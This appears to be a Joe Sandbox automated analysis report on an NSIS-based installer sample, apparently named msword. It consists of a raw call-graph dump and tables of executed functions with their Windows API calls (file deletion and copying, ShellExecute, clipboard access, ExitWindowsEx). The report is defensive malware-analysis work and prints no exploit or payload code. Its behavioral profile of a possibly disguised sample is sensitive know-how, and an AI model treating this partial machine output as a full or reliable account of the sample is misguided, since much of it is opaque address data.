3972->4016 3979 4062d5 2 API calls 3973->3979 4001 406e58 3973->4001 3973->4012 3975 406cf9 3976 406d03 lstrcatW 3975->3976 3977 406d0d 3975->3977 3978 406d13 3976->3978 3980 406751 2 API calls 3977->3980 3982 406d23 lstrcatW 3978->3982 3983 406d19 3978->3983 3981 406e64 3979->3981 3980->3978 3986 406722 3 API calls 3981->3986 3981->4012 3985 406d2b lstrlenW FindFirstFileW 3982->3985 3983->3982 3983->3985 3984 4062a3 11 API calls 3984->4012 3987 406e3b 3985->3987 3991 406d52 3985->3991 3988 406e6e 3986->3988 3987->3973 3990 4062a3 11 API calls 3988->3990 3989 405d06 CharNextW 3989->3991 3992 406e79 3990->3992 3991->3989 3995 406e18 FindNextFileW 3991->3995 4004 406c9b 72 API calls 3991->4004 4011 404f72 25 API calls 3991->4011 4013 4062a3 11 API calls 3991->4013 4014 404f72 25 API calls 3991->4014 4015 406c68 42 API calls 3991->4015 4017 406009 lstrcpynW 3991->4017 4018 405e30 GetFileAttributesW 3991->4018 3993 405e30 2 API calls 3992->3993 3994 406e81 RemoveDirectoryW 3993->3994 3998 406ec4 3994->3998 3999 406e8d 3994->3999 3995->3991 3997 406e30 FindClose 3995->3997 3997->3987 4000 404f72 25 API calls 3998->4000 3999->4001 4002 406e93 3999->4002 4000->4012 4001->3984 4003 4062a3 11 API calls 4002->4003 4005 406e9d 4003->4005 4004->3991 4007 404f72 25 API calls 4005->4007 4009 406ea7 4007->4009 4010 406c68 42 API calls 4009->4010 4010->4012 4011->3995 4012->3491 4012->3492 4013->3991 4014->3991 4015->3991 4016->3975 4017->3991 4019 405e4d DeleteFileW 4018->4019 4020 405e3f SetFileAttributesW 4018->4020 4019->3991 4020->4019 4021->3653 4022->3677 4023->3698 4024->3698 4025->3685 4027 406ae7 GetShortPathNameW 4026->4027 4028 406abe 4026->4028 4029 406b00 4027->4029 4030 406c62 4027->4030 4052 405e50 GetFileAttributesW CreateFileW 4028->4052 4029->4030 4032 406b08 WideCharToMultiByte 4029->4032 4030->3705 4032->4030 4034 406b25 WideCharToMultiByte 4032->4034 4033 406ac7 CloseHandle GetShortPathNameW 4033->4030 4035 406adf 4033->4035 4034->4030 4036 406b3d wsprintfA 4034->4036 4035->4027 4035->4030 4037 406805 18 API calls 4036->4037 4038 406b69 4037->4038 4053 405e50 GetFileAttributesW CreateFileW 4038->4053 4040 406b76 4040->4030 4041 406b83 GetFileSize GlobalAlloc 4040->4041 4042 406ba4 ReadFile 4041->4042 4043 406c58 CloseHandle 4041->4043 4042->4043 4044 406bbe 4042->4044 4043->4030 4044->4043 4054 405db6 lstrlenA 4044->4054 4047 406bd7 lstrcpyA 4050 406bf9 4047->4050 4048 406beb 4049 405db6 4 API calls 4048->4049 4049->4050 4051 406c30 SetFilePointer WriteFile GlobalFree 4050->4051 4051->4043 4052->4033 4053->4040 4055 405df7 lstrlenA 4054->4055 4056 405dd0 lstrcmpiA 4055->4056 4057 405dff 4055->4057 4056->4057 4058 405dee CharNextA 4056->4058 4057->4047 4057->4048 4058->4055 4939 402a84 4940 401553 19 API calls 4939->4940 4941 402a8e 4940->4941 4942 401446 18 API calls 4941->4942 4943 402a98 4942->4943 4944 401a13 4943->4944 4945 402ab2 RegEnumKeyW 4943->4945 4946 402abe RegEnumValueW 4943->4946 4947 402a7e 4945->4947 4946->4944 4946->4947 4947->4944 4948 4029e4 RegCloseKey 4947->4948 4948->4944 4949 402c8a 4950 402ca2 4949->4950 4951 402c8f 4949->4951 4953 40145c 18 API calls 4950->4953 4952 401446 18 API calls 4951->4952 4955 402c97 4952->4955 4954 402ca9 lstrlenW 4953->4954 4954->4955 4956 402ccb WriteFile 4955->4956 4957 401a13 4955->4957 4956->4957 4958 40400d 4959 40406a 4958->4959 4960 40401a lstrcpynA lstrlenA 4958->4960 4960->4959 4961 40404b 4960->4961 4961->4959 4962 404057 GlobalFree 4961->4962 4962->4959 4963 401d8e 4964 40145c 18 API calls 4963->4964 4965 401d95 ExpandEnvironmentStringsW 4964->4965 4966 401da8 4965->4966 4968 401db9 4965->4968 4967 401dad lstrcmpW 4966->4967 4966->4968 4967->4968 4969 401e0f 4970 401446 18 API calls 4969->4970 4971 401e17 4970->4971 4972 401446 18 API calls 4971->4972 4973 401e21 4972->4973 4974 4030e3 4973->4974 4976 405f51 wsprintfW 4973->4976 4976->4974 4977 402392 4978 40145c 18 API calls 4977->4978 4979 402399 4978->4979 4982 4071f8 4979->4982 4983 406ed2 25 API calls 4982->4983 4984 407218 4983->4984 4985 407222 lstrcpynW lstrcmpW 4984->4985 4986 4023a7 4984->4986 4987 407254 4985->4987 4988 40725a lstrcpynW 4985->4988 4987->4988 4988->4986 4059 402713 4074 406009 lstrcpynW 4059->4074 4061 40272c 4075 406009 lstrcpynW 4061->4075 4063 402738 4064 40145c 18 API calls 4063->4064 4066 402743 4063->4066 4064->4066 4065 402752 4068 40145c 18 API calls 4065->4068 4070 402761 4065->4070 4066->4065 4067 40145c 18 API calls 4066->4067 4067->4065 4068->4070 4069 40145c 18 API calls 4071 40276b 4069->4071 4070->4069 4072 4062a3 11 API calls 4071->4072 4073 40277f WritePrivateProfileStringW 4072->4073 4074->4061 4075->4063 4989 402797 4990 40145c 18 API calls 4989->4990 4991 4027ae 4990->4991 4992 40145c 18 API calls 4991->4992 4993 4027b7 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027c0 GetPrivateProfileStringW lstrcmpW 4994->4995 4996 402e18 4997 40145c 18 API calls 4996->4997 4998 402e1f FindFirstFileW 4997->4998 4999 402e32 4998->4999 5004 405f51 wsprintfW 4999->5004 5001 402e43 5005 406009 lstrcpynW 5001->5005 5003 402e50 5004->5001 5005->5003 5006 401e9a 5007 40145c 18 API calls 5006->5007 5008 401ea1 5007->5008 5009 401446 18 API calls 5008->5009 5010 401eab wsprintfW 5009->5010 4286 401a1f 4287 40145c 18 API calls 4286->4287 4288 401a26 4287->4288 4289 4062a3 11 API calls 4288->4289 4290 401a49 4289->4290 4291 401a64 4290->4291 4292 401a5c 4290->4292 4340 406009 lstrcpynW 4291->4340 4339 406009 lstrcpynW 4292->4339 4295 401a62 4299 406038 5 API calls 4295->4299 4296 401a6f 4297 406722 3 API calls 4296->4297 4298 401a75 lstrcatW 4297->4298 4298->4295 4301 401a81 4299->4301 4300 4062d5 2 API calls 4300->4301 4301->4300 4302 405e30 2 API calls 4301->4302 4304 401a98 CompareFileTime 4301->4304 4305 401ba9 4301->4305 4309 4062a3 11 API calls 4301->4309 4313 406009 lstrcpynW 4301->4313 4319 406805 18 API calls 4301->4319 4326 405ca0 MessageBoxIndirectW 4301->4326 4330 401b50 4301->4330 4337 401b5d 4301->4337 4338 405e50 GetFileAttributesW CreateFileW 4301->4338 4302->4301 4304->4301 4306 404f72 25 API calls 4305->4306 4308 401bb3 4306->4308 4307 404f72 25 API calls 4310 401b70 4307->4310 4311 40337f 37 API calls 4308->4311 4309->4301 4314 4062a3 11 API calls 4310->4314 4312 401bc6 4311->4312 4315 4062a3 11 API calls 4312->4315 4313->4301 4321 401b8b 4314->4321 4316 401bda 4315->4316 4317 401be9 SetFileTime 4316->4317 4318 401bf8 CloseHandle 4316->4318 4317->4318 4320 401c09 4318->4320 4318->4321 4319->4301 4322 401c21 4320->4322 4323 401c0e 4320->4323 4325 406805 18 API calls 4322->4325 4324 406805 18 API calls 4323->4324 4327 401c16 lstrcatW 4324->4327 4328 401c29 4325->4328 4326->4301 4327->4328 4329 4062a3 11 API calls 4328->4329 4331 401c34 4329->4331 4332 401b93 4330->4332 4333 401b53 4330->4333 4334 405ca0 MessageBoxIndirectW 4331->4334 4335 4062a3 11 API calls 4332->4335 4336 4062a3 11 API calls 4333->4336 4334->4321 4335->4321 4336->4337 4337->4307 4338->4301 4339->4295 4340->4296 5011 40209f GetDlgItem GetClientRect 5012 40145c 18 API calls 5011->5012 5013 4020cf LoadImageW SendMessageW 5012->5013 5014 4030e3 5013->5014 5015 4020ed DeleteObject 5013->5015 5015->5014 5016 402b9f 5017 401446 18 API calls 5016->5017 5022 402ba7 5017->5022 5018 402c4a 5019 402bdf ReadFile 5021 402c3d 5019->5021 5019->5022 5020 401446 18 API calls 5020->5021 5021->5018 5021->5020 5028 402d17 ReadFile 5021->5028 5022->5018 5022->5019 5022->5021 5023 402c06 MultiByteToWideChar 5022->5023 5024 402c3f 5022->5024 5026 402c4f 5022->5026 5023->5022 5023->5026 5029 405f51 wsprintfW 5024->5029 5026->5021 5027 402c6b SetFilePointer 5026->5027 5027->5021 5028->5021 5029->5018 5030 402b23 GlobalAlloc 5031 402b39 5030->5031 5032 402b4b 5030->5032 5033 401446 18 API calls 5031->5033 5034 40145c 18 API calls 5032->5034 5035 402b41 5033->5035 5036 402b52 WideCharToMultiByte lstrlenA 5034->5036 5037 402b93 5035->5037 5038 402b84 WriteFile 5035->5038 5036->5035 5038->5037 5039 402384 GlobalFree 5038->5039 5039->5037 5041 4044a5 5042 404512 5041->5042 5043 4044df 5041->5043 5045 40451f GetDlgItem GetAsyncKeyState 5042->5045 5052 4045b1 5042->5052 5109 405c84 GetDlgItemTextW 5043->5109 5048 40453e GetDlgItem 5045->5048 5055 40455c 5045->5055 5046 4044ea 5049 406038 5 API calls 5046->5049 5047 40469d 5107 404833 5047->5107 5111 405c84 GetDlgItemTextW 5047->5111 5050 403d3f 19 API calls 5048->5050 5051 4044f0 5049->5051 5054 404551 ShowWindow 5050->5054 5057 403e74 5 API calls 5051->5057 5052->5047 5058 406805 18 API calls 5052->5058 5052->5107 5054->5055 5060 404579 SetWindowTextW 5055->5060 5065 405d59 4 API calls 5055->5065 5056 403dca 8 API calls 5061 404847 5056->5061 5062 4044f5 GetDlgItem 5057->5062 5063 40462f SHBrowseForFolderW 5058->5063 5059 4046c9 5064 40677e 18 API calls 5059->5064 5066 403d3f 19 API calls 5060->5066 5067 404503 IsDlgButtonChecked 5062->5067 5062->5107 5063->5047 5068 404647 CoTaskMemFree 5063->5068 5069 4046cf 5064->5069 5070 40456f 5065->5070 5071 404597 5066->5071 5067->5042 5072 406722 3 API calls 5068->5072 5112 406009 lstrcpynW 5069->5112 5070->5060 5076 406722 3 API calls 5070->5076 5073 403d3f 19 API calls 5071->5073 5074 404654 5072->5074 5077 4045a2 5073->5077 5078 40468b SetDlgItemTextW 5074->5078 5083 406805 18 API calls 5074->5083 5076->5060 5110 403d98 SendMessageW 5077->5110 5078->5047 5079 4046e6 5081 4062fc 3 API calls 5079->5081 5090 4046ee 5081->5090 5082 4045aa 5086 4062fc 3 API calls 5082->5086 5084 404673 lstrcmpiW 5083->5084 5084->5078 5087 404684 lstrcatW 5084->5087 5085 404730 5113 406009 lstrcpynW 5085->5113 5086->5052 5087->5078 5089 404739 5091 405d59 4 API calls 5089->5091 5090->5085 5095 406751 2 API calls 5090->5095 5096 404785 5090->5096 5092 40473f GetDiskFreeSpaceW 5091->5092 5094 404763 MulDiv 5092->5094 5092->5096 5094->5096 5095->5090 5098 4047e2 5096->5098 5099 4043ad 21 API calls 5096->5099 5097 404805 5114 403d85 KiUserCallbackDispatcher 5097->5114 5098->5097 5100 40141d 80 API calls 5098->5100 5101 4047d3 5099->5101 5100->5097 5103 4047e4 SetDlgItemTextW 5101->5103 5104 4047d8 5101->5104 5103->5098 5105 4043ad 21 API calls 5104->5105 5105->5098 5106 404821 5106->5107 5115 403d61 5106->5115 5107->5056 5109->5046 5110->5082 5111->5059 5112->5079 5113->5089 5114->5106 5116 403d74 SendMessageW 5115->5116 5117 403d6f 5115->5117 5116->5107 5117->5116 5118 402da5 5119 4030e3 5118->5119 5120 402dac 5118->5120 5121 401446 18 API calls 5120->5121 5122 402db8 5121->5122 5123 402dbf SetFilePointer 5122->5123 5123->5119 5124 402dcf 5123->5124 5124->5119 5126 405f51 wsprintfW 5124->5126 5126->5119 5127 4030a9 SendMessageW 5128 4030c2 InvalidateRect 5127->5128 5129 4030e3 5127->5129 5128->5129 5130 401cb2 5131 40145c 18 API calls 5130->5131 5132 401c54 5131->5132 5133 4062a3 11 API calls 5132->5133 5136 401c64 5132->5136 5134 401c59 5133->5134 5135 406c9b 81 API calls 5134->5135 5135->5136 4086 4021b5 4087 40145c 18 API calls 4086->4087 4088 4021bb 4087->4088 4089 40145c 18 API calls 4088->4089 4090 4021c4 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021cd 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021d6 4093->4094 4095 404f72 25 API calls 4094->4095 4096 4021e2 ShellExecuteW 4095->4096 4097 40221b 4096->4097 4098 40220d 4096->4098 4100 4062a3 11 API calls 4097->4100 4099 4062a3 11 API calls 4098->4099 4099->4097 4101 402230 4100->4101 5144 402238 5145 40145c 18 API calls 5144->5145 5146 40223e 5145->5146 5147 4062a3 11 API calls 5146->5147 5148 40224b 5147->5148 5149 404f72 25 API calls 5148->5149 5150 402255 5149->5150 5151 405c3f 2 API calls 5150->5151 5152 40225b 5151->5152 5153 4062a3 11 API calls 5152->5153 5156 4022ac CloseHandle 5152->5156 5159 40226d 5153->5159 5155 4030e3 5156->5155 5157 402283 WaitForSingleObject 5158 402291 GetExitCodeProcess 5157->5158 5157->5159 5158->5156 5161 4022a3 5158->5161 5159->5156 5159->5157 5160 406332 2 API calls 5159->5160 5160->5157 5163 405f51 wsprintfW 5161->5163 5163->5156 5164 4040b8 5165 4040d3 5164->5165 5173 404201 5164->5173 5169 40410e 5165->5169 5195 403fca WideCharToMultiByte 5165->5195 5166 40426c 5167 404276 GetDlgItem 5166->5167 5168 40433e 5166->5168 5170 404290 5167->5170 5171 4042ff 5167->5171 5174 403dca 8 API calls 5168->5174 5176 403d3f 19 API calls 5169->5176 5170->5171 5179 4042b6 6 API calls 5170->5179 5171->5168 5180 404311 5171->5180 5173->5166 5173->5168 5175 40423b GetDlgItem SendMessageW 5173->5175 5178 404339 5174->5178 5200 403d85 KiUserCallbackDispatcher 5175->5200 5177 40414e 5176->5177 5182 403d3f 19 API calls 5177->5182 5179->5171 5183 404327 5180->5183 5184 404317 SendMessageW 5180->5184 5187 40415b CheckDlgButton 5182->5187 5183->5178 5188 40432d SendMessageW 5183->5188 5184->5183 5185 404267 5186 403d61 SendMessageW 5185->5186 5186->5166 5198 403d85 KiUserCallbackDispatcher 5187->5198 5188->5178 5190 404179 GetDlgItem 5199 403d98 SendMessageW 5190->5199 5192 40418f SendMessageW 5193 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5192->5193 5194 4041ac GetSysColor 5192->5194 5193->5178 5194->5193 5196 404007 5195->5196 5197 403fe9 GlobalAlloc WideCharToMultiByte 5195->5197 5196->5169 5197->5196 5198->5190 5199->5192 5200->5185 4195 401eb9 4196 401f24 4195->4196 4197 401ec6 4195->4197 4198 401f53 GlobalAlloc 4196->4198 4199 401f28 4196->4199 4200 401ed5 4197->4200 4207 401ef7 4197->4207 4201 406805 18 API calls 4198->4201 4206 4062a3 11 API calls 4199->4206 4211 401f36 4199->4211 4202 4062a3 11 API calls 4200->4202 4205 401f46 4201->4205 4203 401ee2 4202->4203 4208 402708 4203->4208 4213 406805 18 API calls 4203->4213 4205->4208 4209 402387 GlobalFree 4205->4209 4206->4211 4217 406009 lstrcpynW 4207->4217 4209->4208 4219 406009 lstrcpynW 4211->4219 4212 401f06 4218 406009 lstrcpynW 4212->4218 4213->4203 4215 401f15 4220 406009 lstrcpynW 4215->4220 4217->4212 4218->4215 4219->4205 4220->4208 5201 4074bb 5203 407344 5201->5203 5202 407c6d 5203->5202 5204 4073c2 GlobalFree 5203->5204 5205 4073cb GlobalAlloc 5203->5205 5206 407443 GlobalAlloc 5203->5206 5207 40743a GlobalFree 5203->5207 5204->5205 5205->5202 5205->5203 5206->5202 5206->5203 5207->5206

                                                                    Executed Functions

                                                                    Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                    • GetClientRect.USER32(?,?), ref: 00405196
                                                                    • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                    • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                      • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                    • ShowWindow.USER32(00000000), ref: 004052E7
                                                                    • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                    • ShowWindow.USER32(00000008), ref: 00405333
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                    • CreatePopupMenu.USER32 ref: 00405376
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                    • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                    • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                    • EmptyClipboard.USER32 ref: 00405411
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                    • CloseClipboard.USER32 ref: 0040546E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1869014806.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msword.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                    • String ID: @rD$New install of "%s" to "%s"${
                                                                    • API String ID: 2110491804-2409696222
                                                                    • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                    • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                    • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                    • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                    Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                    APIs
                                                                    • #17.COMCTL32 ref: 004038A2
                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                    • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                    • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                    • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                    • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                    • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                    • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                    • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                    • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                    • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                    • ExitProcess.KERNEL32 ref: 00403AF1
                                                                    • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                    • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                    • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                    • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                    • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                    • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                    • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1868715864.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1868689499.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1868780106.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
